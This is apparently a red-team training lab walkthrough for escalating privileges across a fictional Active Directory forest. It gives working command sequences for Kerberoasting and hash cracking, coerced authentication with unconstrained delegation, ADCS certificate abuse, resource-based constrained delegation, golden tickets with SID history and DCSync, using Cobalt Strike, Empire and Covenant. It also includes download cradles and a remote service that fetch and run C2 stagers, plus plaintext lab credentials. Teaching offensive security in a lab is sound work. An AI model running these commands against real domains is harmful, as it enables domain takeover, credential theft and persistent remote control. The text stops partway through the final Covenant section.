Lab 5.1: AD Privilege Escalation
Objectives
- Exploit several AD misconfigurations to escalate privileges in the domain
- Compromise root domain through parent-child trust abuse
- Compromise different Domain Tree through tree-root trust abuse
TTPs Emulated in This Lab
- T1558: Steal or Forge Kerberos Tickets
- T1134.005: Access Token Manipulation: SID-History Injection
- T1021.003: Remote Services: Distributed Component Object Model
- T1003.006: OS Credential Dumping: DCSync
Preparation
Preparation Steps
If you have lost your Beacon/Agent on wk01.draconem.corp please deploy a new one.
As a reminder, the credentials we have compromised are:
- Username: Gareth.Kilgallen
- Password: Hu825meapvsAq#Rx
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
Cobalt Strike can be accessed through guacamole http://10.130.2.22:8080/guacamole username: student password:Sec565!!
The Cobalt Strike Teamserver credentials are as follows
host: 10.130.4.100
password: sec565@!
The ports you can use with Cobalt Strike are 8888 for setting up a stager and 8443 for setting up a listener.
The easiest way to land a beacon in the lab is using the Scripted Web Delivery function in Cobalt Strike and then performing a download cradle under the form of
iex (irm -useb http://10.130.4.100:8888/a)
replace /a with whatever value you provided in the dialogue in Cobalt Strike.
If you need to copy paste commands, you can do so by opening the guacamole menu. On a Windows device, the Guacamole menu is displayed by pressing Ctrl + Alt + Shift. On a Mac, the Guacamole menu is displayed by pressing Ctrl ^ + Command ⌘ + Shift.
A new guacamole menu will appear in which you'll be able to paste your text. afterwards you'll be able to paste the text of the guacamole menu in your guacamole session, just like any normal paste.
On Your Own
- Perform Kerberoasting and try to crack the password of
svc_migration.
use thesvc_migrationaccount to compromiseprodwhich is constrained for unconstrained delegation.
Coerce authentication of the domain controller and use it to compromise the domain. - Use 'Certify' to identify any vulnerable templates published to ADCS, request a vulnerable certificate and use it to compromise the domain.
- Use
svc_migrationandStandInto abuse resource based constrained delegation towarddb01 - Use domain admin access
Sarah.Szepe:A5jKJ9dw8ra6VZ%&ondev.draconem.corpto jump todraconem.corpusing the SID history attack. - Use domain admin access
Almeria.Zanelli:e$Ccj!W49E57#aS6ondraconem.corpand force authentication from thunderbird.corp; use the forced authentication to compromise thethunderbirddomain.
Walkthrough
In this lab, we will explore three attack paths to escalate our domain privileges.
Once we have achieved domain admin status, we will abuse our privileged access to compromise additional domains.
Attack Path 1: Kerberoasting to DA
In this attack path we will perform a kerberoasting attack to achieve access to a machine that is configured for unconstrained delegation.
We can then use our credentials to force the domain controller to connect back to us and harvest the incoming TGT, effectively compromising the domain.
The svc_migration account looks like an interesting target.
Cobalt Strike Approach
The first step is to start the kerberoast. Since we enumerated the domain already, we know that svc_migration looks like an interesting account to kerberoast as it allows for cifs access to prod.draconem.corp.
1. In order to perform kerberoasting, we can utilize execute-assembly to execute Rubeus.
execute-assembly c:\Tools\Rubeus.exe kerberoast /user:svc_migration /format:hashcat /rc4 /nowrap
As you cannot copy information from your student machine we have pasted the output here for your convenience:
Note: Your output might look different (this is because your domain has a different SID, which influences the ticket), not to worry the result of the crack will be the same!
$krb5tgs$23$*svc_migration$draconem.corp$CIFS/prod.draconem.corp@draconem.corp*$824D3ECC70E83A74694FB6F0112D748D$8F5E28715151695213823133A1165B76DEB9F869938933A0B46D35998F6624723017256784E174F7CEEC8D0449A9E6D66FFF9ECE61BEE2031CB4889A902D09955997F6BECD4A9A383D414477D184C4C8354F2F1EFE8DF30FCC51479A81BA742B565B9DF29D4EF6A4C84FBC04222C2050466F05A09A48CED4B626DE17C59F9EB9386EC04B9C1E938A9189A2E1FE810BA79A50DBBAB5169DB37386A44D195C52391CDB9330A1D13A3F08E4506EDCBF66EC5A5234E48EAB01C9FE0A36BE468F7ED834B66D5A3D53004BA43E8109E66FA79DECA9BE55105012FC7C051A9B9A5DDF6BC9693A4BF6F2933F9238A26B64717DA88F88B34AA992424AB0168A928C28FF23B495C16C54F93117E0B65DF0AE05DC5BF66A7658588BD56ED48974593BE491406C95C872B2C17D764AD52FED827837997D26909C87CA1A0F2E500C1451A99FBB1B8AB8A8357C1AFB6D0B1ACF7AD441D16CA722D2ECB2ADFEF3A61434703444B38ACC9C5C21DD94A0C41767A4904F83CB6048AC2D5749D61ECF29828838AD20794FA54B1BFFD32743DA901084328F0419DD96E8D9FD39FDE4BD3CB096FC75BA4F955A3E107455E4D8A82D5E7760B1483059AC84B6F08B2C2A82EDB9B7B9436B5714E793861B3E3D3E93E4FD3DFFAACC82A30239BA9F1AA038A4735276975D1C157E7A677102138C35BF47167E47C6D5A0194973BF6CF2FCB60D1CDB090CD1895B0122C729CF558A96318ECACE7C2BB075D2E04F6BB7B2DB0A60CD7CA7FFD5E269064763F1ABA2714D7DE15BE87ED81D74E87B8164AC954FDD07F04EB4BD045753FD665F2E853DFFFF60DCC803E22B58119AAF77B39EC0D02DCE25C2F74AF78B021C92342D71E6A83AC10213C6B063190136E5F5A99CE30727EBEFFF4800D6B709D64E70BBA6FBC0D5D4CDB657BC49C9687D286735424DEFDFBA311A47F90AE339B9D415A5CB14E0CBA8D27D1AD9A741A79F4A1787F6066037A1B6F66EE1A24A1D19068D3BD1D91070F857B3775966CCFEE0595DC41BC01338FB5E055D72372F2AD0D7F611EAA828C17696EE2EC460427343573C1F3D7E2651CD64AD115F4CDAB5CB10B4080192A97A02408EAFDC0452AF451F74B09ED094C01521DB4E9211A9B21B11CCA95DD3C42949E90D85EDCB4EBFB08F60079C5FCD3B7797DBFE885BC3011BC5B5501922BF453FEC69E7351885D8D528E2670F603C73F8BBCEA09ABECECF7A25A13A405E6ED6766A36B36C1693FA032787689FD83EEC114E5CA0C893B455DF7A1F48F5F2FE6148993D34553972832E318D938D648B99B5BC6459A507A5EDA76584FB51B26542AF4D485E6655C9C8A895CE4A9FD03360E2F2D1C8D6CAF5F5248F774DC177C15B523336F6CE7CE51DA7AB2AC036545AF26B8DE10EB6B9264C1339FB621906486E3409FB558F398C53501DC21614D295F581728274C19FDC2AB48A6F2CA9C1A073AB5A08D76EB343CB44A93C499A9EC466920355D71642A70BE9995CC250BBCFEB8EB088A71A498D8C8519E9E5C25ACF3B78782A0F05C3EDA7C50EE1E5EA2A26431DC0E2EA363DDF34F69B6EF796F90E7E482BBA6AA608281E99F6503EA6D3F61579853E6753809BA6432E40ABEBBEA9BCA4D9398B3B88537A90E68D054B5DCC
Now that we have a rc4 ticket in the hashcat format (can be viewed in the tasks results of Empire) we can try to brute-force it. In order to do that, we will first need to create a new file with the rc4 string inside of it:
Hashcat is a program that is capable of performing brute force attacks. It supports a multitude of hashes and has several different attacks ranging from full brute force to dictionary attacks.
For the sake of illustration, we have provided you a password list. In a real life operation, you would typically resort to a well-known wordlist such as rockyou or weakpass or a custom made dictionary for the environment you are targeting.
2. Now that we have our hashfile and wordlist file, we can attempt to brute force it with hashcat
hashcat -m 13100 '<full path to ticketfile>' -a0 '/home/sec565/Desktop/passwordlist.txt'
We successfully cracked the password of svc_migration as it was set to ChangeMe123! which is not really considered very secure. Now that we have the plain-text password, you can use your favorite technique that we have discussed to enumerate access rights of this newly compromised account! This service account appears to have local admin rights on the prod.draconem.corp machine which, coincidentally is configured for unconstrained delegation. Feel free to use your favorite lateral movement technique to spawn a new Agent on the machine.
An example of lateral movement with this account can be found below:
3. first, we make a new token with the newly found credentials.
make_token draconem\svc_migration ChangeMe123!
4. we can now lateral move to prod, for example using the following command (change your listener name if needed)
jump psexec64 prod HTTPS-SHORT
5. A new beacon will have checked in, we are going to use that beacon for the next few steps. Let's set the beacon to interactive
sleep 0
6. Let us now run Rubeus in monitor mode to wait for incoming TGT's
execute-assembly C:\Tools\Rubeus.exe monitor /targetuser:DC01$ /interval:5 /nowrap
7. Now that Rubeus is monitoring, let's coerce authentication using SpoolSample
execute-assembly c:\Tools\SpoolSample.exe dc01 prod
After a few seconds, a new TGT should appear in your beacon output
8. Let's import the ticket using Rubeus (replace with the ticket you captured)
execute-assembly c:\Tools\Rubeus.exe ptt /ticket:<your ticket here>
9. Finally, with the imported ticket we can dcsync
dcsync draconem.corp draconem\krbtgt
Empire Approach
Attention
As explained in the lecture, Empire and Rubeus monitor mode do not play nicely together. It is not recommended to perform these kinds of attack in Empire, but should the situation arises that you absolutely NEED to, it is still possible but NOT OpSec safe.
The first step is to start the Kerberoast. Since we enumerated the domain already, we know that svc_migration looks like an interesting account to Kerberoast as it allows for cifs access to prod.draconem.corp
10. Let's use Rubeus to achieve this task. Empire has Rubeus functionality built-in through the powershell/credentials/rubeus task
kerberoast /user:svc_migration /format:hashcat /rc4 /nowrap
Now that we have a rc4 ticket in the hashcat format (can be viewed in the tasks results of Empire) we can try to brute-force it. In order to do that, we will first need to create a new file with the rc4 string inside of it:
Hashcat is a program that is capable of performing brute force attacks. It supports a multitude of hashes and has several different attacks ranging from full brute force to dictionary attacks.
For the sake of illustration, we have provided you a password list. In a real life operation, you would typically resort to a well-known wordlist such as rockyou or weakpass or a custom made dictionary for the environment you are targeting.
11. Now that we have our hashfile and wordlist file, we can attempt to brute force it with hashcat
hashcat -m 13100 '<full path to ticketfile>' -a0 '/home/sec565/Desktop/passwordlist.txt'
We successfully cracked the password of svc_migration as it was set to ChangeMe123! which is not really considered very secure. Now that we have the plaintext password, you can use your favorite technique that we have discussed to enumerate access rights of this newly compromised account!
This service account appears to have local admin rights on the prod.draconem.corp machine which, coincidentally, is configured for unconstrained delegation.
Feel free to use your favorite lateral movement technique to spawn a new Agent on the machine.
12. For illustration, we are going to use the following technique (feel free to swap it out with another one we covered in previous lab!)
- Techniques:powershell/lateral_movement/invoke_psremoting
- computername:prod.draconem.corp
- Listener:choose from dropdown
- Password:ChangeMe123!
- UserName: svc_migration
Now that we have a new Agent running on prod.draconem.corp we can utilize Rubeus once again to start monitoring incoming TGTs.
Attention
13. Here is where it gets a little tricky, as invoking this command will freeze up the Agent. To get "around" this issue, we will have to spawn an additional agent.
Please do so now (you could, for example, use powershell/management/spawn on the new Agent running on prod.draconem.corp to spawn a secondary one).
14. On one of your agents running on prod.draconem.corp issue the following task:
- Techniques:powershell/credentials/rubeus
- Command:monitor /targetuser:DC01$ /interval:5 /runfor:120 /consoleoutfile:C:\Users\Public\tickets.txt /nowrap
15. Now that this agent is running Rubeus in the background, we can utilize SpoolSampleto coerce one of the domain controllers into authenticating to our controlled machine from our SECONDARY agent (not the same agent used for rubeus monitoring!).
Techniques:powershell/management/invoke_scriptScriptcmd:Invoke-SpoolSample -Command "dc01 prod"ScriptPath:/home/sec565/tools/Invoke-SpoolSample.ps1
16. Download the ticket file back to our server using the File Browser tab in Empire, this can be achieved by simply right clicking the file (C:\Users\Public\tickets.txt) and selecting download.
Since the monitor is running for 120 seconds, this file is locked during that period of time. If you try to download the locked file it will output an error, simply wait a litle longer and download the file again.
17. We can see where Empire saved the file by looking at our server logs.
18. Now we will have to create a sacrificial process with Rubeus
Techniques:powershell/credentials/rubeuscommand:createnetonly /program:C:\Windows\System32\cmd.exe
createnetonly /program:C:\Windows\System32\cmd.exe
19. Take close note of the LUID and PID in the output, as we will need it for later!
20. Now we will import our ticket into the new LUID:
!!! Warning
Sometimes the `nowrap` command in Rubeus does not do its job properly, in order to make sure, copy paste the contents of rubeus ticket in another text file. In case you see whitespaces and new lines, save the text file and use the following bash command to format it to a non wrapped ticket:
`cat <your ticket file> | tr -d [:space:] > formatted`
copy the formatted content to your clipboard and use it in the next step.
Techniques:powershell/credential/rubeusCommand: ptt /luid:/ticket:
21. All that remains now is steal the token of the process where the ticket got applied into:
Techniques:powershell/credentials/tokensImpersonateUser:TrueProcessID:<PID spawned by Rubeus>
22. As a final step, we can use Mimikatz to perform a DCSync from the agent you used to steal the token with:
Techniques:powershell/credentials/mimikatz/dcsyncUser:draconem\krbtgt
In case you were unsuccessfull
Sometimes, Empire does not play nice with new logon sessions.
In case the DCsync did not work for you, try to do the lab again but skipping over step 19 and simply import the ticket in your current session.
As described in class this is not very opsec safe, but is one way to get passed the limitations of Empire.
BONUS: Covenant Approach
The first step is to start the Kerberoast. Since we enumerated the domain already, we know that svc_migration looks like an interesting account to Kerberoast as it allows for cifs access to prod.draconem.corp.
Let's use Rubeus to achieve this task. Covenant has Rubeus functionality built in, but unfortunately Covenant does not keep up with latest releases.
A pro tip would be to use the Assembly task and download or compile the latest Rubeus release yourself. That way, you are insured you will have access to the latest Rubeus functionality.
However, for the sake of this lab, this is not required.
23.
rubeus kerberoast /user:svc_migration /format:hashcat /rc4 /nowrap
Now that we have a rc4 ticket in the hashcat format we can try to brute-force it. In order to do that, we will first need to create a new file with the rc4 string inside of it:
Hashcat is a program that is capable of performing brute force attacks.
It supports a multitude of hashes and has several different attacks ranging from full brute force to dictionary attacks.
For the sake of illustration, we have provided you a password list.
Note
In a real life operation, you would typically resort to a well-known wordlist such as rockyou or weakpass or a custom made dictionary for the environment you are targetting.
24. Now that we have our hashfile and wordlist file, we can attempt to brute force it with hashcat:
hashcat -m 13100 '<full path to ticketfile>' -a0 '/home/sec565/Desktop/passwordlist.txt'
We successfully cracked the password of svc_migration as it was set to ChangeMe123! which is not really considered very secure.
Now that we have the plaintext password, you can use your favorite technique that we have discussed to enumerate access rights of this newly compromised account!
This service account appears to have local admin rights on the prod.draconem.corp machine which, coincidentally, is configured for unconstrained delegation.
25. Feel free to use your favorite lateral movement technique to spawn a new Grunt on the machine. As an example we are using the PowerShellRemotingGrunt task of Covenant.
ComputerName: prodLauncher: PowerShellDomain: draconem.corpUserName: svc_migrationPassword: ChangeMe123!
26. Now that we have a new Grunt running on prod.draconem.corp we can utilize Rubeus once again to start monitorring incoming TGTs. Issue the following command on the new Grunt you spawned running on prod.draconem.corp
Rubeus monitor /targetuser:DC01$ /interval:5 /nowrap
Note
Another approach would be to use:
Rubeus monitor /targetuser:DC01$ /interval:5 /runfor:120 /consoleoutfile:C:\Users\Public\tickets.txt /nowrap
The above command will pipe all console output to tickets.txt and will not show up in Covenants output.
As Covenant is capeable of running background tasks, this is possible to do. Empire agents on the other hand would lock up on this step and would require an additional agent.
27. Now that this is running in the background, we can utilize SpoolSample (located in /home/sec565/tools) to coerce one of the domain controllers into authenticating to our controlled machine.
Assembly /assemblyname:"SpoolSample" /parameters:"dc01 prod"
After a few moments, a TGT should appear in Covenants output:
28. Now that we have the TGT of DC01$ we can kill the running Rubeus job as it has served its purpose (Tasks will get you the taskID to kill):
29. Finally, we can use MakeToken dontcare draconem.corp dontcare to create a sacrifical session.
30. Now that we have a sacrificial session, we can use Rubeus to pass-the-ticket.
Warning
Sometimes the nowrap command in Rubeus does not do its job properly, in order to make sure, copy paste the contents of rubeus in a text file. In case you see whitespaces and new lines, save the text file and use the following bash command to format it to a non wrapped ticket:
cat <your ticket file> | tr -d [:space:] > formatted
copy the formatted content to your clipboard and use it in the next step.
In order to avoid our Grunt crashing, it is advised to use the Assembly task to run a newer version fo Rubeus located in /home/sec565/tools instead of the built-in Rubeus
Assembly /assemblyname:"Rubeus" /parameters:"ptt /ticket:<ticket from the monitor command above>
31. As a final step, we can use Mimikatz to perform a DCSync
dcsync draconem\krbtgt draconem.corp dc01
Attention
As mentioned already, Covenant does not always have the latest dependencies bundled, it is safer to use your own tradecraft instead of relying on the built-in functionality. For the sake of the lab, DCsync functionality will work, but on newer operating systems such as Windows 11 or Server 2022 it might not!
Attack Path 2: AD CS Abuse
In this attack path, we will abuse the Active Directory Certificate Services. As it turns out, there is a template published that allows us to supply the subject name in the request, allowing us to impersonate whomever we want!
Use your high integrity implant from prod.draconem.corp for this attack scenario UNLESS OTHERWISE INSTRUCTED
In case you lost your implant, make sure to follow the lateral movement steps from last lab again
Cobalt Strike Approach
32. In order to figure out if Active Directory Certificate Services is present in the environment we can use Certify
execute-assembly C:\Tools\Certify.exe find /vulnerable
Pay close attention to the Enterprise CA Name and the template name as those two parameters will be important for subsequent attack steps. We identified that there is a vulnerable certificate template called UserAuthenticationCertificate. It is vulnerable because this template can be used for authentication purposes and the enrollee can supply the subject themselves.
RUN THIS STEP BELOW as a NON SYSTEM USER (for example, Gareth's beacon on WK01)
33. Let's request a certificate for one of the domain administrators almeria.zanelli
execute-assembly C:\Tools\Certify.exe request /template:UserAuthenticationCertificate /altname:almeria.zanelli /ca:dc01.draconem.corp\draconem-DC01-CA
Unfortunately, due to security restrictions, you are unable to copy data from your student machine. As a result, we cannot continue the rest of the exercise with Cobalt Strike, feel free to take a look at Covenant and Empire sections on how to proceed, once you have obtained the correct certificate format, you can attempt to perform the same steps with cobalt strike!
Empire Approach
34. In order to figure out if Active Directory Certificate Services is present in the environment we can use Certify
Certify find /vulnerable We will need to modify the Invoke-Ceritfy.ps1 script which can be found in /home/sec565/tools.
cd /home/sec565/tools
rm Invoke-Certify.ps1
wget https://raw.githubusercontent.com/jfmaes/SEC565-Tools/main/Invoke-Certify.ps1
Techniques:powershell/management/invoke_scriptScriptCmd:Invoke-Certify -Command "find /vulnerable"ScriptPath:/home/sec565/tools/Invoke-Certify.ps1
35. Pay close attention to the Enterprise CA Name and the template name as those two parameters will be important for subsequent attack steps. We identified that there is a vulnerable certificate template called UserAuthenticationCertificate. It is vulnerable because this template can be used for authentication purposes and the enrollee can supply the subject themselves.
36. Let's request a certificate for one of the domain administrators almeria.zanelli
Techniques:powershell/management/invoke_scriptScriptCmd:Invoke-Certify -Command "request /template:UserAuthenticationCertificate /altname:almeria.zanelli /ca:dc01.draconem.corp\draconem-DC01-CA"ScriptPath:/home/sec565/tools/Invoke-Certify.ps1
37. Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file called output, which we will then later transform into cert.pem on your Slingshot machine's Desktop.
Make sure to remove any whitespaces. Open a terminal and type.
cd /home/sec565/Desktop
awk 'NF' output > cert.pem
(make sure you are where you saved your cert.pem file (cd /home/sec565/Desktop))
38. Now, run the openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx command to convert it to a .pfx. When prompted, don't enter a password.
39. We now have a pfx cert that can be used by Rubeus to request a new TGT on behalf of almeria.zanelli; however, we still need to convert it to an appropriate base64 format using base64 cert.pfx | tr -d "\r\n" > rubeusinput:
40. Copy the contents of the rubeusinput file and use it in the following Rubeus command.
Techniques:powershell/credentials/rubeusCommand:asktgt /nowrap /user:almeria.zanelli /certificate:<rubeusinput>
41. If everything went well, we should now be in possession of a TGT for almeria.zanelli. Let's create a sacrifical session using MakeToken and import the ticket using Rubeus ptt.
Techniques:csharp/Sharpsploit.Credentials/MakeTokendomain:draconem.corp
Techniques:powershell/credentials/rubeusCommand:ptt /ticket:<result of previous asktgt command>
43. Finally, we can now perform a DCSync.
- Techniques : powershell/credentials/mimikatz/dcsync
- user : draconem\krbtgt
BONUS: Covenant Approach
44. In order to figure out if Active Directory Certificate Services is present in the environment we can use Certify
Assembly /assemblyname: "Certify" /parameters: "find /vulnerable".
Certify can be found in /home/sec565/tools
Pay close attention to the Enterprise CA Name and the template name as those two parameters will be important for subsequent attack steps. We identified that there is a vulnerable certificate template called UserAuthenticationCertificate. It is vulnerable because this template can be used for authentication purposes and the enrollee can supply the subject themselves.
45. Let's request a certificate for one of the domain administrators almeria.zanelli
Assembly /Assemblyname:"Certify" /parameters:"request /template:UserAuthenticationCertificate /altname:almeria.zanelli /ca:dc01.draconem.corp\draconem-DC01-CA"
46. Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file ouput on your Slingshot machine's Desktop.
47. To make sure that the file is in the correct format, we will remove any empty lines (make sure you are in the location where u saved the output file (cd /home/sec565/Desktop)) awk 'NF' output > cert.pem:
48. Now, run the following command to convert it to a .pfx. When prompted, don't enter a password.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
49. We now have a pfx cert that can be used by Rubeus to request a new TGT on behalf of almeria.zanelli; however, we still need to convert it to an appropriate base64 format using base64 cert.pfx | tr -d "\r\n" > rubeusinput:
50. Copy the contents of the rubeusinput file and use it in the following Rubeus command
(use an Assembly task, do not use the built in Rubeus):
asktgt /user:almeria.zanelli /certificate:<rubeusinput> /nowrap
51. If everything went well, we should now be in possession of a TGT for almeria.zanelli. Let's create a sacrifical session using MakeToken.
Warning
Sometimes the nowrap command in Rubeus does not do its job properly, in order to make sure, copy paste the contents of rubeus in a text file. In case you see whitespaces and new lines, save the text file and use the following bash command to format it to a non wrapped ticket:
cat <your ticket file> | tr -d [:space:] > formatted
copy the formatted content to your clipboard and use it in the next step.
maketoken sacrificialsession draconem.corp idontknow
52. and import the ticket using Rubeus ptt:
rubeus ptt /ticket:<TICKET>
53. Finally, we can now perform a DCSync.
dcsync krbtgt draconem\draconem.corp dc01.draconem.corp
Attack Path 3: RBCD
In this attack path, we will abuse resource based constrained delegation. As a reminder, this attack can only get executed if you have compromised an object that has write privileges on the msDS-AllowedToActOnBehalfOfOtherIdentity property of the object you wish to compromise.
In this example, svc_migration appears to have these rights on db01.draconem.corp. This attack can be executed using StandIn,PowerView or the AD module, in combination with Rubeus.
Apart from having write privileges on the msDS-AllowedToActOnBehalfOfOtherIdentity property, we will also need to have compromised an account with an SPN or we have to create one ourselves. Since we compromised svc_migration already, we will utilize this account for the full kill chain, but feel free to explore various different approaches.
An excellent resource on this topic can be found here.
Warning
Make sure to execute the next attack from an implant that is running under svc_migration! (NOT SYSTEM)!
For Empire and Covenant, you should already have an agent/grunt running as svc_migration, if not please make sure to spawn one using psremoting for example.
For cobalt strike, you should have a SYSTEM level beacon at this point, please spawn an additional one by using jump winrm64 PROD HTTPS-SHORT on the implant you used to jump to prod in attack path 1. (running on wk01)
Cobalt Strike Approach
To exploit this attack primitive we are going to be utilizing the StandIn executable using the Assembly task in Cobalt Strike. You will have to know the SID of svc_migration. This is different for everyone and can be found in BloodHound or using Powerview/SharpView.
54. Let's use SharpView to figure out the SID of svc_migration
execute-assembly C:\Tools\SharpView.exe Get-DomainUser -Identity svc_migration
note the SID without the {}, as we will need it for next steps.
55. Let's use StandIn to write to the msDS-AllowedToActOnBehalfOfOtherIdentity property of db01
execute-assembly C:\Tools\StandIn.exe --computer db01 --sid <sid you enumerated>
56. Now that we modified the msDS-AllowedToActOnBehalfOfOtherIdentity property on db01.draconem.corp we can utilize Rubeus to perform S4U2self, S4U2Proxy, and impersonate almeria.zanelli towards db01.draconem.corp
To calculate the hash from a plaintext password you can use the Rubeus Hash method or an online website such as https://codebeautify.org/ntlm-hash-generator
execute-assembly C:\Tools\Rubeus.exe s4u /user:svc_migration /rc4:BCD0D654E20EF7B7C68582A25E384605 /impersonateuser:almeria.zanelli /msdsspn:host/db01 /altservice:host,cifs /nowrap /ptt
57. Now that we successfully passed-the-ticket, we can schedule a new service on db01.draconem.corp and start it afterward.
jump psexec64 db01 HTTPS-SHORT
A new SYSTEM beacon should check in.
Empire Approach
To exploit this attack primitive we are going to be utilizing the Invoke-Standin.ps1.
Warning
58. This command has to be executed from the context of svc_migration so feel free to spawn a new agent (powershell/management/spawnas) under that context or utilize your favorite user impersonation method!
59. You will have to know the SID of svc_migration this is different for everyone and can be found in BloodHound or using Powerview/SharpView.
The easiest way in Empire would be to use the powershell/situational_awareness/network/powerview/get_user command and fill in svc_migration in the identity field.
60. After having the SID, lets use the following command:
- Techniques:powershell/management/invoke_script
- ScriptCmd:Invoke-StandIn -Command "--computer db01 --sid <SID_YOU_ENUMERATED>"
- ScriptPath:/home/sec565/tools/Invoke-StandIn.ps1
61. Now that we modified the msDS-AllowedToActOnBehalfOfOtherIdentity property on db01.draconem.corp we can utilize Rubeus to perform S4U2self, S4U2Proxy, and impersonate almeria.zanelli towards db01.draconem.corp.
We are going to request a ticket for the host service and as an alternate service we are going to specify krbtgt, for a nice refference overview of service types and what they could be used for: https://adsecurity.org/?p=2011
To calculate the hash from a plain-text password (ChangeMe123!) you can use the Rubeus Hash method or an online website such as https://codebeautify.org/ntlm-hash-generator.
Techniques:powershell/credentials/rubeusCommand:s4u /user:svc_migration /rc4:BCD0D654E20EF7B7C68582A25E384605 /impersonateuser:almeria.zanelli /msdsspn:host/db01 /altservice:cifs,host /nowrap /ptt
62. Now that we successfully passed-the-ticket, we can schedule a new service on db01.draconem.corp and start it afterward.
Techniques:powershell/lateral_movement/invoke_psexecComputerName:db01.draconem.corp
When done correctly, a new SYSTEM agent will check-in.
BONUS: Covenant Approach
To exploit this attack primitive we are going to be utilizing the StandIn executable using the Assembly task in Covenant. You will have to know the SID of svc_migration. This is different for everyone and can be found in BloodHound or using Powerview/SharpView.
63. The quickest way to get the SID would likely be by using PowerShellImport importing powerview and then invoking PowerShell Get-DomainUser -Identity svc_migration and noting the SID.
Warning
64. This command has to be executed from the context of svc_migration so feel free to spawn a new grunt under that context or utilize your favorite user impersonation method!
Now that we modified the msDS-AllowedToActOnBehalfOfOtherIdentity property on db01.draconem.corp we can utilize Rubeus to perform S4U2self, S4U2Proxy, and impersonate almeria.zanelli towards db01.draconem.corp.
65. We are going to request a ticket for the host service and as an alternate service we are going to specify host and cifs, for a nice reference overview of service types and what they could be used for: https://adsecurity.org/?p=2011
To calculate the hash from a plaintext password you can use the Rubeus Hash method or an online website such as https://codebeautify.org/ntlm-hash-generator
Rubeus s4u /user:svc_migration /rc4:BCD0D654E20EF7B7C68582A25E384605 /impersonateuser:almeria.zanelli /msdsspn:host/db01 /altservice:host,cifs /nowrap /ptt
66. Now that we successfully passed-the-ticket, we can schedule a new service on db01.draconem.corp and start it afterward:
replace the URL with your stager URL
powershell c:\windows\system32\sc.exe \\db01.draconem.corp create TestService binpath= "%comspec /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex(iwr -useb http://10.254.252:8000/covenant)"
powershell C:\Windows\System32\sc.exe \\db01.draconem.corp start TestService
When done correctly, a new SYSTEM grunt will check-in.
Hopping the Trust: Parent-Child
Attention
IMPORTANT NOTICE
Since november 2021, a patch was introduced to prevent golden ticket attacks through additional PAC validation.
Since november 2022, this patch is enforced, and effectively breaks the golden ticket attack with standard tooling such as mimikatz.
There is a pull request already in mimikatz to implement a bypass of this patch, but it is not yet in the main release bundled with C2s.
As a result Rubeus is better suited for this task.
For more technical details please check out this article: https://blog.netwrix.com/2022/01/10/pacrequestorenforcement-and-kerberos-authentication/
For this part of the course we are going to assume breach on the domain controller of dev.draconem.corp
Please note that the domain SID will be different in your environment than the one shown in the example, since these get randomly generated per lab deployment.
The domain admin credentials are:
- Username
Sarah.Szepe - Password
A5jKJ9dw8ra6VZ%&
Using the domain admin credentials, we will extract the krbtgt NTHASH of the dev.draconem.corp domain. We will then create a golden ticket with extra sids to take advantage of SID history.
Use your svc_migration implant for the first part of this attack, switch to Sarah.Szeppe's implant after you have laterally moved.
Cobalt Strike Approach
67. First off, perform a DCSync attack against the dev\krbtgt user to obtain the krbtgt NTLM hash of dev.draconem.corp.
Let's spawn a new beacon with the credentials we just got.
make_token dev\Sarah.Szepe A5jKJ9dw8ra6VZ%&
jump winrm64 dev-dc01.dev.draconem.corp HTTPS-SHORT
A new beacon will check in on dev-dc01! We will use this Beacon for the next steps
68. Perform a DCSync attack against the dev\krbtgt user to obtain the krbtgt NTLM hash of dev.draconem.corp.
sleep 0
dcsync dev.draconem.corp dev\krbtgt
69. We will need the SID of our parent domain as well, the easiest way to get this information is by using PowerView .
powershell-import C:\Tools\PowerView-Modded.ps1
powershell get-domaintrust -API
70. We will now impersonate Administrator on the draconem.corp domain by adding the well-known group 519 (Enterprise Admins) to our ticket, and adding <SID of draconem.corp>-519 to the SID history of the ticket.
Attention
Your SIDs will likely be different than the example! Same for the krbtgt password!
execute-assembly C:\Tools\Rubeus.exe golden /aes256:<YOUR AES256 KRBTGT HASH> /user:administrator /domain:dev.draconem.corp /ldap /sids:<YOUR DRACONEM.CORP SID>-519 /newpac /ptt
71. Now that we successfully imported the golden ticket with SID history, we can dcsync the parent domain.
dcsync draconem.corp draconem\krbtgt
Empire Approach
72. First off, perform a DCSync attack against the dev\krbtgt user to obtain the krbtgt NTLM hash of dev.draconem.corp.
Let's spawn a new agent with the credentials we just got.
- Technique: powershell/lateral_movement/invoke_psremoting
- ComputerName:dev-dc01.dev.draconem.corp
- Listener: choose from dropdown
- Password:A5jKJ9dw8ra6VZ%&
- Username: dev\Sarah.Szepe
73. On the new agent issue the following task:
- Techniques:powershell/credentials/mimikatz/dcsync
- User:dev\krbtgt
- Domain:dev.draconem.corp
74. Now we also need the SID of the parent domain draconem.corp, we can enumerate this quickly using the built-in powershell/situational_awareness/network/powerview/get_domain_trust task.
- Techniques: powershell/situational_awareness/network/powerview/get_domain_trust
- API : True
75. We are going to have to download a newer PowerShellified version of Rubeus, on your slingshot please issue the following commands:
cd /home/sec565/tools
wget wget https://raw.githubusercontent.com/jfmaes/SEC565-Tools/main/Invoke-Rubeus.ps1
76. We will now impersonate Administrator on the draconem.corp domain by adding the well-known group 519 (Enterprise Admins) to our ticket, and adding <SID of draconem.corp>-519 to the SID history of the ticket:
Attention
Your SIDs will likely be different than the example! Same for the krbtgt password! The output of the Rubeus command is too big for Empire to display, as a result your output will just be stuck at "Job Started", rest assured, your ticket was imported!
Techniques:powershell/management/invoke_scriptScriptCmd:Invoke-Rubeus -Command "golden /aes256:<YOUR AES256 KRBTGT HASH> /user:administrator /domain:dev.draconem.corp /ldap /sids:<YOUR DRACONEM.CORP SID>-519 /newpac /ptt"ScriptPath:/home/sec565/tools/Invoke-Rubeus.ps1
77. Finally, we can perform a DCSync attack toward draconem.corp from dev.draconem.corp.
- Techniques : powershell/credentials/mimikatz/dcsync
- user:draconem\krbtgt
- domain:draconem.corp
BONUS: Covenant Approach
78. First off, Spawn a new grunt on dev-dc01.draconem.corp using your favorite lateral movement technique. As an example we will use PowerShellRemotingGrunt
